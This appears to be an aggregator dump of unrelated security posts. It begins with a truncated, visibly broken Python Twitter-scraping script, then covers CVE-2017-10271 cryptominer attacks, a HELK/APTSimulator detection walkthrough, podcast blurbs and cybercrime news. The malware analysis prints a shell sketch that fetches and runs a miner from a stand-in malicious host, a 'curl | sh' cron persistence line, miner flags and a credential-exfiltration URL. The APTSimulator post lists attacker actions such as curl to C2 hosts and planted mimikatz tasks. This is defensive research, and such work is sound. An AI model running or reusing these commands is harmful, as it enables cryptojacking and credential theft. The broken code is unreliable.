    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        return user["screen_name"]

# Returns a list of screen_names that the user interacted with in this Tweet
def get_interactions(status):
  interactions = []
  if "in_reply_to_screen_name" in status:
    replied_to = status["in_reply_to_screen_name"]
    if replied_to is not None and replied_to not in interactions:
      interactions.append(replied_to)
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "quoted_status" in status:
    orig_tweet = status["quoted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "entities" in status:
    entities = status["entities"]
    if "user_mentions" in entities:
      for item in entities["user_mentions"]:
        if item is not None and "screen_name" in item:
          mention = item['screen_name']
          if mention is not None and mention not in interactions:
            interactions.append(mention)
  return interactions

# Returns a list of hashtags found in the tweet
def get_hashtags(status):
  hashtags = []
  if "entities" in status:
    entities = status["entities"]
    if "hashtags" in entities:
      for item in entities["hashtags"]:
        if item is not None and "text" in item:
          hashtag = item['text']
          if hashtag is not None and hashtag not in hashtags:
            hashtags.append(hashtag)
  return hashtags

# Returns a list of URLs found in the Tweet
def get_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
    if "urls" in entities:
      for item in entities["urls"]:
        if item is not None and "expanded_url" in item:
          url = item['expanded_url']
          if url is not None and url not in urls:
            urls.append(url)
  return urls

# Returns the URLs to any images found in the Tweet
def get_image_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
    if "media" in entities:
      for item in entities["media"]:
        if item is not None:
          if "media_url" in item:
            murl = item["media_url"]
            if murl not in urls:
              urls.append(murl)
  return urls

# Main starts here
if __name__ == '__main__':
# Add your own API key values here
  consumer_key = ""
  consumer_secret = ""
  access_token = ""
  access_token_secret = ""

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

# Check that search terms were provided at the command line
  target_list = []
  if (len(sys.argv) > 1):
    target_list = sys.argv[1:]
  else:
    print("No search terms provided. Exiting.")
    sys.exit(0)

  num_targets = len(target_list)
  for count, target in enumerate(target_list):
    print(str(count + 1) + "/" + str(num_targets) + " searching on target: " + target)
# Create a separate save directory for each search query
# Since search queries can be a whole sentence, we'll check the length
# and simply number it if the query is overly long
    save_dir = ""
    if len(target) < 30:
      save_dir = target.replace(" ", "_")
    else:
      save_dir = "target_" + str(count + 1)
    if not os.path.exists(save_dir):
      print("Creating directory: " + save_dir)
      os.makedirs(save_dir)
# Variables for capturing stuff
    tweets_captured = 0
    influencer_frequency_dist = Counter()
    mentioned_frequency_dist = Counter()
    hashtag_frequency_dist = Counter()
    url_frequency_dist = Counter()
    user_user_graph = {}
    user_hashtag_graph = {}
    hashtag_hashtag_graph = {}
    all_image_urls = []
    tweets = {}
    tweet_count = 0
# Start the search
    for status in
# Output some status as we go, so we know something is happening
      sys.stdout.write("\rCollected " + str(tweet_count) + " tweets.")
      sys.stdout.flush()
      tweet_count += 1
      screen_name = None
      if "user" in status:
        if "screen_name" in status["user"]:
          screen_name = status["user"]["screen_name"]

      retweeted = retweeted_user(status)
      if retweeted is not None:
        influencer_frequency_dist[retweeted] += 1
        influencer_frequency_dist[screen_name] += 1

# Tweet text can be in either "text" or "full_text" field...
      text = None
      if "full_text" in status:
        text = status["full_text"]
      elif "text" in status:
        text = status["text"]

      id_str = None
      if "id_str" in status:
        id_str = status["id_str"]

# Assemble the URL to the tweet we received...
      tweet_url = None
      if id_str is not None and screen_name is not None:
        tweet_url = "" + screen_name + "/status/" + id_str

# ...and capture it
      if tweet_url is not None and text is not None:
        tweets[tweet_url] = text

# Record mapping graph between users
      interactions = get_interactions(status)
      if interactions is not None:
        for user in interactions:
          mentioned_frequency_dist[user] += 1
          if screen_name not in user_user_graph:
            user_user_graph[screen_name] = {}
          if user not in user_user_graph[screen_name]:
            user_user_graph[screen_name][user] = 1
          else:
            user_user_graph[screen_name][user] += 1

# Record mapping graph between users and hashtags
      hashtags = get_hashtags(status)
      if hashtags is not None:
        if len(hashtags) > 1:
          hashtag_interactions = []
# This code creates pairs of hashtags in situations where multiple
# hashtags were found in a tweet
# This is used to create a graph of hashtag-hashtag interactions
          for comb in combinations(sorted(hashtags), 2):
            hashtag_interactions.append(comb)
          if len(hashtag_interactions) > 0:
            for inter in hashtag_interactions:
              item1, item2 = inter
              if item1 not in hashtag_hashtag_graph:
                hashtag_hashtag_graph[item1] = {}
              if item2 not in hashtag_hashtag_graph[item1]:
                hashtag_hashtag_graph[item1][item2] = 1
              else:
                hashtag_hashtag_graph[item1][item2] += 1
        for hashtag in hashtags:
          hashtag_frequency_dist[hashtag] += 1
          if screen_name not in user_hashtag_graph:
            user_hashtag_graph[screen_name] = {}
          if hashtag not in user_hashtag_graph[screen_name]:
            user_hashtag_graph[screen_name][hashtag] = 1
          else:
            user_hashtag_graph[screen_name][hashtag] += 1

      urls = get_urls(status)
      if urls is not None:
        for url in urls:
          url_frequency_dist[url] += 1

      image_urls = get_image_urls(status)
      if image_urls is not None:
        for url in image_urls:
          if url not in all_image_urls:
            all_image_urls.append(url)

# Iterate through image URLs, fetching each image if we haven't already
    print("Fetching images.")
    pictures_dir = os.path.join(save_dir, "images")
    if not os.path.exists(pictures_dir):
      print("Creating directory: " + pictures_dir)
      os.makedirs(pictures_dir)
    for url in all_image_urls:
      m ="^http:\/\/pbs\.twimg\.com\/media\/(.+)$", url)
      if m is not None:
        filename =
        print("Getting picture from: " + url)
        save_path = os.path.join(pictures_dir, filename)
        if not os.path.exists(save_path):
          response = requests.get(url, stream=True)
          with open(save_path, 'wb') as out_file:
            shutil.copyfileobj(response.raw, out_file)
          del response

# Output a bunch of files containing the data we just gathered
    print("Saving data.")
    json_outputs = {"tweets.json": tweets,
                    "urls.json": url_frequency_dist,
                    "hashtags.json": hashtag_frequency_dist,
                    "influencers.json": influencer_frequency_dist,
                    "mentioned.json": mentioned_frequency_dist,
                    "user_user_graph.json": user_user_graph,
                    "user_hashtag_graph.json": user_hashtag_graph,
                    "hashtag_hashtag_graph.json": hashtag_hashtag_graph}
    for name, dataset in json_outputs.items():
      filename = os.path.join(save_dir, name)
      save_json(dataset, filename)

# These files are created in a format that can be easily imported into Gephi
    csv_outputs = {"user_user_graph.csv": user_user_graph,
                   "user_hashtag_graph.csv": user_hashtag_graph,
                   "hashtag_hashtag_graph.csv": hashtag_hashtag_graph}
    for name, dataset in csv_outputs.items():
      filename = os.path.join(save_dir, name)
      save_csv(dataset, filename)

    text_outputs = {"hashtags.txt": hashtag_frequency_dist,
                    "influencers.txt": influencer_frequency_dist,
                    "mentioned.txt": mentioned_frequency_dist,
                    "urls.txt": url_frequency_dist}
    for name, dataset in text_outputs.items():
      filename = os.path.join(save_dir, name)
      save_text(dataset, filename)

Running this tool will create a directory for each search term provided at the command-line. To search for a sentence, or to include multiple terms, enclose the argument with quotes. Due to Twitter’s rate limiting, your search may hit a limit, and need to pause to wait for the rate limit to reset. Luckily twarc takes care of that. Once the search is finished, a bunch of files will be written to the previously created directory.

Since I use a Mac, I can use its Quick Look functionality from the Finder to browse the output files created. Since pytorch is gaining a lot of interest, I ran my script against that search term. Here are some examples of how I can quickly view the output files.

The preview pane is enough to get an overview of the recorded data.


Pressing spacebar opens the file in Quick Look, which is useful for data that doesn’t fit neatly into the preview pane.

Importing the user_user_graph.csv file into Gephi provided me with some neat visualizations about the pytorch community.

A full zoom out of the pytorch community

Here we can see who the main influencers are. It seems that Yann LeCun and François Chollet are Tweeting about pytorch, too.

Here’s a zoomed-in view of part of the network.

Zoomed in view of part of the Gephi graph generated.

If you enjoyed this post, check out the previous two articles I published on using the Twitter API here and here. I hope you have fun tailoring this script to your own needs!

They Stole My Shoes – Paul’s Security Weekly #548

This week, Steve Tcherchian, CISO and Director of Product Management of XYPRO Technology joins us for an interview! In our second feature interview, Paul speaks with Michael Bazzell, OSINT & Privacy Consultant! In the news, we have updates from Google, Bitcoin, NSA, Microsoft, and more on this episode of Paul's Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining


FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in certain versions of Oracle WebLogic Server, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The perception that these cryptocurrency mining operations are less risky, along with their potentially substantial profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().

Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).

Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers

Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence

Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers

Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task named “Update service for Oracle products1”. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers

Figure 6: Terminating processes directly

Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key

Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.
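Put together, such an invocation might look like the following fragment. All values below are placeholders for illustration, not observed indicators, and the binary name assumes an XMRig-style miner, which these flags are consistent with:

```
miner.exe -a cryptonight -o stratum+tcp://<pool_host>:<port> -u <wallet_key> -p <password> -k -t 2
```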

  • Limiting CPU usage to avoid suspicion

Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether it’s running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, the malware uses the PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to determine whether the particular host is vulnerable to EternalBlue, and uses that vulnerability to spread to it.

After all network-derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to those hosts.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.

Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers

Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware

Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence

Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage

Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.
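Taken together, the four behaviors above can be sketched roughly as follows. Process names, the download URL, and the CPU threshold are illustrative assumptions rather than indicators from the samples, and the destructive commands are left commented out.

```shell
# Rough sketch of the shell script's behavior (Figures 11-14).
# Names, URL, and threshold are illustrative; kill/cron actions are commented out.

# 1. Terminate processes matching known miner strings (Figure 11)
#    pkill -f minerd; pkill -f cryptonight; pkill -f xmrig

# 2. Download and execute the cryptominer (Figure 12)
#    curl -fsSL http://<malicious-host>/miner -o /tmp/miner && chmod +x /tmp/miner && /tmp/miner &

# 3. Cron job that re-fetches the script every 10 minutes (Figure 13)
CRON_ENTRY='*/10 * * * * curl -fsSL http://<malicious-host>/ | sh'
echo "$CRON_ENTRY"                  # would be installed via crontab

# 4. Kill any other process using excessive CPU (Figure 14)
#    ps aux | awk '$3 > 50.0 {print $2}' | xargs -r kill -9
```

The last step is crude but effective: anything consuming a large share of CPU is assumed to be a competing miner and terminated, leaving the machine's resources to the attacker's own payload.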


Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner, so that cyber criminals can maximize their reach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

Indicators of Compromise
Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Happy Valentine’s Day – Enterprise Security Weekly #80

This week, Paul and John are accompanied by Guy Franco, Security Consultant for Javelin Networks, who will deliver a Technical Segment on Domain Persistence! In the news, we have updates from ServerSide, Palo Alto, NopSec, Microsoft, and more on this episode of Enterprise Security Weekly!  


Full Show Notes:


Visit for all the latest episodes!

CFTC Brings Cybersecurity Enforcement Action

On February 12, 2018, in a settled enforcement action, the U.S. Commodity Futures Trading Commission (“CFTC”) charged a registered futures commission merchant (“FCM”) with violations of CFTC regulations relating to an ongoing data breach. Specifically, the FCM failed to diligently supervise an information technology provider’s (“IT vendor’s”) implementation of certain provisions in the FCM’s written information systems security program. Though not unprecedented, this case represents a rare CFTC enforcement action premised on a cybersecurity failure at a CFTC-registered entity.

According to the CFTC, a defect in a network-attached storage device installed by the FCM’s IT vendor left customers’ records and other information stored on the device unencrypted and unprotected from cyber-exploitation. The defect left the information unprotected for nearly 10 months and led to the compromise of this data after the FCM’s network was accessed by an unauthorized, unaffiliated third party. The IT vendor failed to discover the vulnerability in subsequent network risk assessments, notwithstanding the fact that the unauthorized third party had blogged about exploiting the same vulnerability at other companies. The FCM did not learn about the breach of its systems until directly contacted by the third party.

The CFTC charged the FCM under Regulation 166.3, which requires that every CFTC registrant “diligently supervise the handling [of confidential information] by its partners, officers, employees and agents,” and Regulation 160.30, which requires all FCMs to “adopt policies and procedures that address administrative, technical and physical safeguards for the protection of customer records and information.” The CFTC noted that an FCM may delegate the performance of its information systems security program’s technical provisions, including those relevant here. But in contracting with an IT vendor as its agent to perform these services, the FCM cannot abdicate its responsibilities under Regulation 166.3, and must diligently supervise the IT vendor’s handling of all activities relating to the registered entity’s business as a CFTC registrant.

To settle the case, the FCM agreed to (1) pay a $100,000 civil monetary penalty and (2) cease and desist from future violations of Regulation 166.3. The CFTC noted the FCM’s cooperation during the investigation and agreed to reduce sanctions as a result.

IDG Contributor Network: How to ensure that giving notice doesn’t mean losing data

Most IT teams invest resources to ensure data security when onboarding new employees. You probably have a checklist that covers network access and permissions, access to data repositories, security policy acknowledgement, and maybe even security awareness education. But how robust is your offboarding security checklist? If you’re just collecting a badge and disabling network and email access on the employee’s last day, you’re not doing enough to protect your data.

Glassdoor reported recently that 35% of hiring decision makers expect more employees to quit in 2018 compared to last year. Whether through malicious intent or negligence, when insiders leave, there’s a risk of data leaving with them. To ensure data security, you need to develop and implement a robust offboarding process.

To read this article in full, please click here

This Is An Emergency – Business Security Weekly #73

This week, Michael and Paul interview Dawn-Marie Hutchinson, Executive Director of Optiv Offline! In the Article Discussion, security concern pushing IT to channel services, what drives sales growth and repeat business, and in the news, we have updates from Proofpoint, J2 Global, LogMeIn, and more on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

FTC Releases PrivacyCon 2018 Agenda

On February 6, 2018, the Federal Trade Commission (“FTC”) released its agenda for PrivacyCon 2018, which will take place on February 28. Following recent FTC trends, PrivacyCon 2018 will focus on privacy and data security considerations associated with emerging technologies, including the Internet of Things, artificial intelligence and virtual reality. The event will feature four panel presentations by over 20 researchers, covering (1) collection, exfiltration and leakage of private information; (2) consumer preferences, expectations and behaviors; (3) economics, markets and experiments; and (4) tools and ratings for privacy management. The FTC’s press release emphasizes the event’s focus on the economics of privacy, including “how to quantify the harms that result when companies fail to secure consumer information, and how to balance the costs and benefits of privacy-protective technologies and practices.”

PrivacyCon 2018, which is free and open to the public, will take place at the Constitution Center conference facility in Washington, D.C. The event will also be webcast on the FTC website and live tweeted using the hashtag #PrivacyCon18.

Jim Carrey Hacked My Facebook – Application Security Weekly #05

This week, Keith and Paul continue to discuss OWASP Application Security Verification Standard! In the news, Cisco investigation reveals ASA vulnerability is worse than originally thought, Google Chrome HTTPS certificate apocalypse, Intel made smart glasses that look normal, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

IDG Contributor Network: 7 ways to stay safe online on Valentine’s Day

Valentine’s Day brings out the softer side in all of us and often plays on our quest for love and appreciation. Online scammers know that consumers are more open to accepting cards, gifts and invitations all in the name of the holiday. While our guards are down, here are a few tips for safeguarding yourself while on your quest to find love on the Internet.

1. Darker side of dating websites

Unfortunately, dating websites — and modern dating apps — are a hunting ground for hackers. There is a peak of online dating activity between New Year’s and Valentine’s Day, and cybercriminals are ready to take advantage of the increased action on popular dating websites like Tinder, OKCupid, Plenty of Fish, and many others. Rogue adverts and rogue profiles are two of the biggest offenders. For example, many are skeptical of unsolicited advertisements via email. Therefore, spammers have moved to popular websites, including dating and adult sites, to post rogue ads and links. In August 2015, Malwarebytes detected malvertising attacks on PlentyOfFish, which draws more than three million daily users. Just a few months later, the U.K. version of online dating website was also caught serving up malvertising.

To read this article in full, please click here

toolsmith #131 – The HELK vs APTSimulator – Part 1

Ladies and gentlemen, for our main attraction, I give you...The HELK vs APTSimulator, in a Death Battle! The late, great Randy "Macho Man" Savage said many things in his day, in his own special way, but "Expect the unexpected in the kingdom of madness!" could be our toolsmith theme this month and next. Man, am I having a flashback to my college days, many moons ago. :-) The HELK just brought it on. Yes, I know, HELK is the Hunting ELK stack, got it, but it reminded me of the Hulk, and then, I thought of a Hulkamania showdown with APTSimulator, and Randy Savage's classic, raspy voice popped in my head with "Hulkamania is like a single grain of sand in the Sahara desert that is Macho Madness." And that, dear reader, is a glimpse into exactly three seconds or less in the mind of your scribe, a strange place to be certain. But alas, that's how we came up with this fabulous showcase.
In this corner, from Roberto Rodriguez, @Cyb3rWard0g, the specter in SpecterOps, it's...The...HELK! This, my friends, is the s**t, worth every ounce of hype we can muster.
And in the other corner, from Florian Roth, @cyb3rops, the Fracas of Frankfurt, we have APTSimulator. All your worst adversary apparitions in one APT mic drop. Battle!

Now with that out of our system, let's begin. There's a lot of goodness here, so I'm definitely going to do this in two parts so as not to undervalue these two offerings.
HELK is incredibly easy to install. It's also well documented, with lots of related reading material; let me propose that you take the time to review it all. Pay particular attention to the wiki, gain comfort with the architecture, then review the installation steps.
On an Ubuntu 16.04 LTS system I ran:
  • git clone
  • cd HELK/
  • sudo ./ 
Of the three installation options presented (pulling the latest HELK Docker image from the cyb3rward0g Docker Hub, building the HELK image from a local Dockerfile, or installing HELK from a local bash script), I chose the first and went with the latest Docker image. The installation script does a fantastic job of fulfilling dependencies for you; if you haven't installed Docker, the HELK install script installs it for you. You can observe the entire install process in Figure 1.
Figure 1: HELK Installation
You can immediately confirm your clean installation by navigating to your HELK KIBANA URL, in my case
For my test Windows system I created a Windows 7 x86 virtual machine with VirtualBox. The key to success here is ensuring that you install Winlogbeat on the Windows systems from which you'd like to ship logs to HELK. More important is ensuring that you run Winlogbeat with the right winlogbeat.yml file. You'll want to modify this and copy it to your target systems. The critical modification is line 123, under the Kafka output, where you need to add the IP address of your HELK server in three spots. My modification appeared as hosts: ["","",""]. As noted in the HELK architecture diagram, HELK consumes Winlogbeat event logs via Kafka.
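If you're scripting the deployment, a substitution along these lines can patch the hosts entry. The three ports (9092-9094) and the placeholder token are assumptions about the stock HELK winlogbeat.yml, so verify against line 123 of your own copy before trusting it.

```shell
# Hedged sketch: substitute your HELK server's address into the Kafka output's
# hosts line. Ports and placeholder token are assumptions; check your config.
HELK_IP=""    # placeholder -- use your HELK server's address
printf '  hosts: ["HELK-IP:9092","HELK-IP:9093","HELK-IP:9094"]\n' > kafka-hosts.tmp
sed "s/HELK-IP/${HELK_IP}/g" kafka-hosts.tmp
```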
On your Windows systems, with a properly modified winlogbeat.yml, you'll run:
  • ./winlogbeat -c winlogbeat.yml -e
  • ./winlogbeat setup -e
You'll definitely want to set up Sysmon on your target hosts as well. I prefer to do so with the @SwiftOnSecurity configuration file. If you're doing so with your initial setup, use sysmon.exe -accepteula -i sysmonconfig-export.xml. If you're modifying an existing configuration, use sysmon.exe -c sysmonconfig-export.xml. This will ensure rich data returns from Sysmon when using adversary emulation services from APTSimulator, as we will, or when experiencing the real deal.
With all set up and working you should see results in your Kibana dashboard as seen in Figure 2.

Figure 2: Initial HELK Kibana Sysmon dashboard.
Now for the showdown. :-) Florian's APTSimulator does some comprehensive emulation to make your systems appear compromised under the following scenarios:
  • POCs: Endpoint detection agents / compromise assessment tools
  • Test your security monitoring's detection capabilities
  • Test your SOCs response on a threat that isn't EICAR or a port scan
  • Prepare an environment for digital forensics classes 
This is a truly admirable effort, one I advocate for most heartily as a blue team leader. With particular attention to testing your security monitoring's detection capabilities, if you don't do so regularly and comprehensively, you are, quite simply, incomplete in your practice. If you haven't tested and validated, don't consider it detection, it's just a rule with a prayer. APTSimulator can be observed conducting the likes of:
  1. Creating typical attacker working directory C:\TMP...
  2. Activating guest user account
    1. Adding the guest user to the local administrators group
  3. Placing a svchost.exe (which is actually srvany.exe) into C:\Users\Public
  4. Modifying the hosts file
    1. Adding mapping to private IP address
  5. Using curl to access well-known C2 addresses
    1. C2:
  6. Dropping a Powershell netcat alternative into the APT dir
  7. Executing nbtscan on the local network
  8. Dropping a modified PsExec into the APT dir
  9. Registering mimikatz in At job
  10. Registering a malicious RUN key
  11. Registering mimikatz in scheduled task
  12. Registering cmd.exe as debugger for sethc.exe
  13. Dropping web shell in new WWW directory
A couple of notes here.
Download and install APTSimulator from the Releases section of its GitHub pages.
APTSimulator includes curl.exe, 7z.exe, and 7z.dll in its helpers directory. Be sure that you drop the correct version of 7-Zip for your system architecture; the default binaries appear to be 64-bit, and I was testing on a 32-bit VM.

Let's do a fast run-through with HELK's Kibana Discover option looking for the above mentioned APTSimulator activities. Starting with a search for TMP in the sysmon-* index yields immediate results and strikes #1, 6, 7, and 8 from our APTSimulator list above, see for yourself in Figure 3.

Figure 3: TMP, PS nc, nbtscan, and PsExec in one shot
Created TMP, dropped a PowerShell netcat, nbtscanned the local network, and dropped a modified PsExec, check, check, check, and check.
How about enabling the guest user account and adding it to the local administrator's group? Figure 4 confirms.

Figure 4: Guest enabled and escalated
Strike #2 from the list. Something tells me we'll immediately find svchost.exe in C:\Users\Public. Aye, Figure 5 makes it so.

Figure 5: I've got your svchost right here
Knock #3 off the to-do, including the process.commandline,, and file.creationtime references. Up next, the At job and scheduled task creation. Indeed, see Figure 6.

Figure 6: tasks OR schtasks
I think you get the point, there weren't any misses here. There are, of course, visualization options. Don't forget about Kibana's Timelion feature. Forensicators and incident responders live and die by timelines, use it to your advantage (Figure 7).

Figure 7: Timelion
Finally, for this month, under HELK's Kibana Visualize menu, you'll note 34 visualizations. By default, these are pretty basic, but you quickly add value with sub-buckets. As an example, I selected the Sysmon_UserName visualization. Initially, it yielded a donut graph inclusive of malman (my pwned user), SYSTEM and LOCAL SERVICE. Not good enough to be particularly useful, so I added a sub-bucket to include process names associated with each user. The resulting graph is more detailed and tells us that of the 242 events in the last four hours associated with the malman user, 32 were specific to cmd.exe processes, or about 13% (Figure 8).

Figure 8: Powerful visualization capabilities
This has been such a pleasure this month; I am thrilled with both HELK and APTSimulator. The true principles of blue team and detection quality are innate in these projects. The fact that Roberto considers HELK still in an alpha state leads me to believe there is so much more to come. Be sure to dig deeply into APTSimulator's Advanced Solutions as well; there's more than one way to emulate an adversary.
Next month Part 2 will explore the Network side of the equation via the Network Dashboard and related visualizations, as well as HELK integration with Spark, Graphframes & Jupyter notebooks.
Aw snap, more goodness to come, I can't wait.
Cheers...until next time.

Weekly Cyber Risk Roundup: Cryptocurrency Attacks and a Major Cybercriminal Indictment

Cryptocurrency continued to make headlines this past week for a variety of cybercrime-related activities.

For starters, researchers discovered a new cryptocurrency miner, dubbed ADB.Miner, that infected nearly 7,000 Android devices such as smartphones, televisions, and tablets over a several-day period. The researchers said the malware uses the ADB debug interface on port 5555 to spread and that it has Mirai code within its scanning module.

In addition, several organizations reported malware infections involving cryptocurrency miners. Four servers at a wastewater facility in Europe were infected with malware designed to mine Monero, and the incident is the first ever documented mining attack to hit an operational technology network of a critical infrastructure operator, security firm Radiflow said. In addition, Decatur County General Hospital recently reported that cryptocurrency mining malware was found on a server related to its electronic medical record system.

Reuters also reported this week on allegations by South Korea that North Korea had hacked into unnamed cryptocurrency exchanges and stolen billions of won. Investors of the Bee Token ICO were also duped after scammers sent out phishing messages to the token’s mailing list claiming that a surprise partnership with Microsoft had been formed and that those who contributed to the ICO in the next six hours would receive a 100% bonus.

All of the recent cryptocurrency-related cybercrime headlines have led some experts to speculate that the use of mining software on unsuspecting users’ machines, or cryptojacking, may eventually surpass ransomware as the primary money maker for cybercriminals.


Other trending cybercrime events from the week include:

  • W-2 data compromised: The City of Pittsburg said that some employees had their W-2 information compromised due to a phishing attack. The University of Northern Colorado said that 12 employees had their information compromised due to unauthorized access to their profiles on the university’s online portal, Ursa, which led to the theft of W-2 information. Washington school districts are warning that an ongoing phishing campaign is targeting human resources and payroll staff in an attempt to compromise W-2 information.
  • U.S. defense secrets targeted: The Russian hacking group known as Fancy Bear successfully gained access to the email accounts of contract workers related to sensitive U.S. defense technology; however, it is uncertain what may have been stolen. The Associated Press reported that the group targeted at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms, or other sensitive activities, and as many as 40 percent of those targeted ultimately clicked on the hackers’ phishing links.
  • Financial information stolen: Advance-Online is notifying customers that their personal and financial information stored on the company’s online platform may have been subject to unauthorized access from April 29, 2017 to January 12, 2018. Citizens Financial Group is notifying customers that their financial information may have been compromised due to the discovery of a skimming device found at a Citizens Bank ATM in Connecticut. Ameriprise Financial is notifying customers that one of its former employees has been calling its service center and impersonating them by using their names, addresses, and account numbers.
  • Other notable events:  Swisscom said that the “misappropriation of a sales partner’s access rights” led to a 2017 data breach that affected approximately 800,000 customers. A cloud repository belonging to the Paris-based brand marketing company Octoly was erroneously configured for public access and exposed the personal information of more than 12,000 Instagram, Twitter, and YouTube personalities. Ron’s Pharmacy in Oregon is notifying customers that their personal information may have been compromised due to unauthorized access to an employee’s email account. Partners Healthcare said that a May 2017 data breach may have exposed the personal information of up to 2,600 patients. Harvey County in Kansas said that a cyber-attack disrupted county services and led to a portion of the network being disabled. Smith Dental in Tennessee said that a ransomware infection may have compromised the personal information of 1,500 patients. Fresenius Medical Care North America has agreed to a $3.5 million settlement to settle potential HIPAA violations stemming from five separate breaches that occurred in 2012.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.


Cyber Risk Trends From the Past Week

A federal indictment charging 36 individuals for their role in a cybercriminal enterprise known as the Infraud Organization, which was responsible for more than $530 million in losses, was unsealed this past week. Acting Assistant Attorney General Cronan said the case is “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.”

The indictment alleges that the group engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband dating back to October 2010. Thirteen of those charged were taken into custody in countries around the world.

As the Justice Department press release noted:

